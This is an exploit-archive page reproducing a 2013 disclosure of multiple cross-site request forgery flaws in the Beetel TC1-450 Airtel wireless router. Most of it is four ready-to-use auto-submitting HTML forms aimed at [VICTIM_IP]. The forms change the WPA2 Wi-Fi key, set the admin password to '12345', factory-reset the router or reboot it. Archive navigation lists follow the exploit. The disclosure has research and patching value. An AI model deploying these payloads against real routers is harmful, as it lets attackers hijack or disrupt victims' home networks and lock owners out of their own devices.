Beetel TC1-450 Airtel Cross Site Request Forgery

Beetel TC1-450 Airtel Cross Site Request Forgery: Posted Dec 16, 2013; Authored by Samandeep Singh; Beetel TC1-450 Airtel wireless router suffers from multiple cross site request forgery vulnerabilities.; tags | exploit, vulnerability, csrf; SHA-256 | 8b6efe00c1b182105a2b509cec1af4ad4d91a9dd268169e60e39a87761abc650; Download | Favorite | View

Beetel TC1-450 Airtel Cross Site Request Forgery

# Exploit Title: Beetel TC1-450 Airtel Wireless Router - Multiple CSRF Vulnerabilities
# Date: 12/13/2013
# Author: SaMaN( @samanL33T )
# Vendor Homepage:http://www.beetel.in/node/10139
# Category: Hardware/Wireless Router
# Firmware Version: TM4-0Q-020 and below
# Tested on: Beetel 450-TC1 Wireless Router
# Patch/ Fix: Upgrade to latest firmware version/ move to Beetle 450-TC2
---------------------------------------------------
  
Technical Details
~~~~~~~~~~~~~~~~~
Beetel 450-TC1 Wireless Router has a Cross Site Request Forgery Vulnerability in its Web Console. Attacker can easily change Wireless password,Reboot Router, Reset Router,Change Router's Admin Password by simply making the user visit a CSRF link.
 
Exploit Code
~~~~~~~~~~~~
 
Change Wifi (WPA2/PSK) password by CSRF
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
<html>
<body onload="document.form.submit();">
<form action="http://[VICTIM_IP]/Forms/home_wlan_1"
method="POST" name="form">
<input type="hidden" name="wlanWEBFlag" value="0">
<input type="hidden" name="wlan_APenable" value="1">
<input type="hidden" name="Countries_Channels" value="[Any Country]">
<input type="hidden" name="Channel_ID" value="00000000">
<input type="hidden" name="AdvWlan_slPower" value="High">
<input type="hidden" name="BeaconInterval" value="100">
<input type="hidden" name="RTSThreshold" value="2347">
<input type="hidden" name="FragmentThreshold" value="2346">
<input type="hidden" name="DTIM" value="1">
<input type="hidden" name="WirelessMode" value="802.11b+g">
<input type="hidden" name="WLSSIDIndex" value="1">
<input type="hidden" name="ESSID_HIDE_Selection" value="0">
<input type="hidden" name="ESSID" value="[SSID of WLAN]">
<input type="hidden" name="WEP_Selection" value="WPA2-PSK">
<input type="hidden" name="wlanWEPFlag" value="0">
<input type="hidden" name="wlanGEMTEKFlag" value="0">
<input type="hidden" name="wlanGEMTEKCMDFlag" value="0">
<input type="hidden" name="wlanGEMTEKDeactiveAPFlag" value="0">
<input type="hidden" name="wlanRadiusWEPFlag" value="0">
<input type="hidden" name="TKIP_Selection" value="AES">
<input type="hidden" name="PreSharedKey" value="[WIFI PASSWORD]">
<input type="hidden" name="WPARekeyInter" value="0">
<input type="hidden" name="WDSMode_Selection" value="0">
<input type="hidden" name="WDSEncryType_Selection" value="TKIP">
<input type="hidden" name="WDSKey" value="">
<input type="hidden" name="WDSPeer_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WDSPeer_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WDSPeer_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WDSPeer_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WLAN_FltActive" value="0">
<input type="hidden" name="WLAN_FltAction" value="00000000">
<input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="CountryChange" value="0">
</form>
</body>
</html>
 
 
Factory Reset Router Settings by CSRF
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
<html>
<body onload="document.form.submit();">
<form action="http://[VICTIM_IP]/Forms/tools_system_1"
method="POST" name="form">
<input type="hidden" name="restoreFlag" value="1">
<input type="hidden" name="Restart" value="RESTART">
</form>
</body>
</html>
 
 
Change Router's Admin Password by CSRF
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
<html>
<body onload="document.form.submit();">
<form action="http://[VICTIM_IP]/Forms/tools_admin_1"
method="POST" name="form">
<input type="hidden" name="uiViewTools_Password" value="12345">
<input type="hidden" name="uiViewTools_PasswordConfirm" value="12345">
</form>
</body>
</html>
 
 
Restart Router by CSRF
~~~~~~~~~~~~~~~~~~~~~
 
<html>
<body onload="document.form.submit();">
<form action="http://[VICTIM_IP]/Forms/tools_system_1"
method="POST" name="form">
<input type="hidden" name="restoreFlag" value="0">
<input type="hidden" name="Restart" value="RESTART">
</form>
</body>
</html>
 
 
--
SaMaN
twitter : @samanL33T <https://twitter.com/samanL33T>

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Beetel TC1-450 Airtel Cross Site Request Forgery

Beetel TC1-450 Airtel Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Beetel TC1-450 Airtel Cross Site Request Forgery

Share This

Beetel TC1-450 Airtel Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems